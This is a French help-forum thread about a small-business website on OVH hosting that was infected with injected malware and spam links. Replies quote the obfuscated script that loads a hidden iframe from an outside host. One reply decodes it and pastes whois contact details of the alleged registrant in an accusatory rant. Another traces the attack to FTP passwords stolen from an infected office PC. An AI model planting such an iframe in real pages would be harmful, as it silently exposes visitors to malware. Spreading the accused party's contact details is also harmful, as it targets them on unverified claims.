Sujet Précédent Sujet Suivant

à l'aide mon site internet pro est infecté!!!

tifeeloo -  
 bidon -
Bonjour à tous

Je viens vers vous pour solliciter votre aide.
Aprés avoir créé mon site pro, celui ci se retrouve infectè.
Dès que j'ouvre la page d'acceuil, kapersky me signale la présence d'un cheval de troie :
http://pubmalei.info/superbison/index...

Aprés avoir lancer une analyse antivirus sur mon pc, kapersky ne detecte rien.
Mon site est hébergé chez OVH.
mon site : http://www.artvisia.fr

Comment faire pour y remèdier?
Merci d'avance pour vos précieux conseils.
Jean
A voir également:

12 réponses

Réponse 1 / 12
domdom751 Messages postés 9 Statut Membre
 
deja cliquer sur le lien site introuvable................
0
Réponse 2 / 12
tifeeloo
 
oui le lien du cheval de troie amène nul part parcontre mon site : http://www.artvisia.fr on peut aller dessus.
Mais c'est la cata sur mon site, allez voir!!!
On ne voit plus les boutons, on peut rien en faire , ya plein de liens sur des sites de viagra, xanax et autres.....
Je vais bien je n'ai pas besoin de ces médicaments!!!! lol

Please!! help me !!!
0
Réponse 3 / 12
tifeeloo
 
Je viens d'appeler OVH il ne prenne pas en compte ce genre de dépannage
aidez-moi!!!
0
Réponse 4 / 12
tifeeloo
 
personne pour m'aider?
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
Réponse 5 / 12
tifeeloo
 
HELP toujours le même problème.
De plus en recherchant sur google mon site, il met : "ce site risque d'endommager votre ordinateur"
Je suis grillé si des clients potentiels passent par google.

J'ai viré tous les liens de référencements dans la page dédiée.
Je fais des mise à jour chaque jour sur mon hébergeur.
Une fois ma mise à jour faite, le site est correct, pas de détection de cheval de troie.
Mais au bout d'une journée ou 2, le site de nouveau ressemble à rien.

Merci pour vos aides
0
Réponse 6 / 12
tifeeloo
 
HELP!
0
Réponse 7 / 12
tifeeloo
 
up!
0
Réponse 8 / 12
gordian
 
J'ai eu le même problème que toi, regarde si tu n'as pas dans tous tes fichiers qui commence par index(.extension) si tu n'as pas ce code cripté:

<!-- o -->
< sc ript type="text/javascript">
<!--
docu ment. write(une scape('%3C%69%66 %72%61%6 D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%61%6C%65%76%69%73%69%74%6F%72%2E%6E%65%74 %2F%69%6E%2E%63%67%69%3F%32%22%20%77%69%64%74%68%3D%31%30%30%20%68% 65%69%67%68%74%3D%3 1%30%30%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
//-->
< / sc ript>

<!-- c -->

J'ai retrouvé ce code dans tous mes fichiers index.php et index.html sur tous mes sites, et également sont hébergés chez ovh
0
Réponse 9 / 12
kitevolution
 
Bonjour, tu a ete hacker par un "robot" localiser a moscou - en russi. voici son email: polaristk@mail.ru

Contact Phone: +7 495 4752917 <<< son telephone
Contact Fax: +7 495 4752917 << son fax

CES PAS DE CONNERIE.. APRES VOILA.. TU VA PAS PORTE PLAINTE CONTRE RUSSE DE PLUS QU'IL A JUSTE MISE UNE PUB INOFENSSIVE.. AU PREJUDISSE MEDIOCRE..

ne parle pas de moi SVP §§§§§ !!!!!

je suis responssable d'une societe xxxxxxxxxx je dit pas car moi aussi il hacker.. le con de facont automatise EN PLUS

Il faut mettre le chmod 644 a tous vos fichier apres desinfection..

MOI AUSSI J'AI ETE INFECTER, MAIS MANQUE DE PO, JE CONNAIS TRES TRES TRES BIEN LE MONDE DE L'INTERNET

PAS DE CHANCHE POUR LUIS, JE ME SUIS PRIS LA TETE GRAVE.

LE MESSAGE CRYPTE - LE VOICI DECRYPTE

<!-- o -->
< sc ript type="text/javascript">
<!--
docu ment. write(une scape('<if ra%6 De src="http://salevisitor.net /in.cgi?2" width=100 h% 65ight=%3 100 style="visibility: hidden;"></iframe>'));
//-->
< / sc ript>

VOICI DES INDICES

http://www.siteadvisor.com/sitereport.html?url=salevisitor.net/summary/

voici les donnees servers

% By submitting a query to RU-CENTER's Whois Service
% you agree to abide by the following terms of use:
% https://www.nic.ru/help/usloviya-pol6zovaniya-uslugami_913.html (in Russian)
% https://www.nic.ru/help/terms-of-use_6009.html (in English).

Domain name: SALEVISITOR.NET
Name Server: ns1.housetelecom.net
Name Server: ns2.housetelecom.net
Creation Date: 2007.04.29
Updated Date: 2007.10.10
Expiration Date: 2009.04.29

Status: DELEGATED

Registrant ID: 1W9YKUU-RU
Registrant Name: OOO "POLARIS TK"
Registrant Organization: OOO "POLARIS TK"
Registrant Street1: Pervomayskaya, 18/1
Registrant City: Moscow
Registrant State: Moscow
Registrant Postal Code: 105037
Registrant Country: RU

Administrative, Technical Contact
Contact ID: 1W9YKUU-RU
Contact Name: OOO "POLARIS TK"
Contact Organization: OOO "POLARIS TK"
Contact Street1: Pervomayskaya, 18/1
Contact City: Moscow
Contact State: Moscow
Contact Postal Code: 105037
Contact Country: RU
Contact Phone: +7 495 4752917
Contact Fax: +7 495 4752917
Contact E-mail: polaristk@mail.ru

Registrar: ANO Regional Network Information Center dba RU-CENTER

Last updated on 2008.10.14 21:11:00 MSK/MSD

CES UN DEBUTANT QUI TROMATIZZZZ TOUS MONDE.. LA FOLLL.. HONTE A LUIS..

REGARDER SON REGISTAR IL FLIPPPP JE LE SENS

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

No match for "SALEVISITOR.COM".
>>> Last update of whois database: Tue, 14 Oct 2008 13:30:04 EDT <<<

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.

POUR VOUS RASSUREZ JE VIENS D'INFORMER GOOGLE RISQUE DE BLOQUE VOTRE SITE WEB CI TOUJOUR VIRUS..

SINON JE SAIS AUSSI OUVRIR DES SITE WEB COMME MYSPACE ect..
0
Réponse 10 / 12
lio
 
Là ou je ne comprends pas c est que moi je n ai pas de site perso et pourtant quand je fait une recherche dans google,et bien ça me mets le même message sur tous les sites que google va trouver en rapport avec ma recherche.
0
Réponse 11 / 12
XFaktor
 
Bonjour,

Histoire d'ajouter de l'information sur le sujet.

Un des ordinateurs de mon bureau a été infecté par Braviax et Av-Fake cette semaine. Nous avons remarqué que tout les sites internet donc cette personne s'occupait avait été infecté par le Downloader du site.

Le virus a selon nos recherches, trouvé le logiciel FTP que l'employer utilisais. Dans ce cas ci, CuteFTP Pro 8, à capturé tout les logins/password et a l'aide d'un robot, se connecte sur les sites pour modifier tout les index.html et index.php (link).

Dans notre cas, il a ajouté un <iframe> après la balise <BODY> de chaque fichier.

Je conseil donc de changer les mots de passe de tout les sites qui se trouve dans vos clients FTP avant même de supprimer la ligne de code en défaut. Sinon, elle reviendra sans cesse.

J'espère pouvoir aider.
0
Réponse 12 / 12
bidon
 
euh ben j'ai le même probleme ,ça n'aide pas, pas on se sent moins seuls :-//
0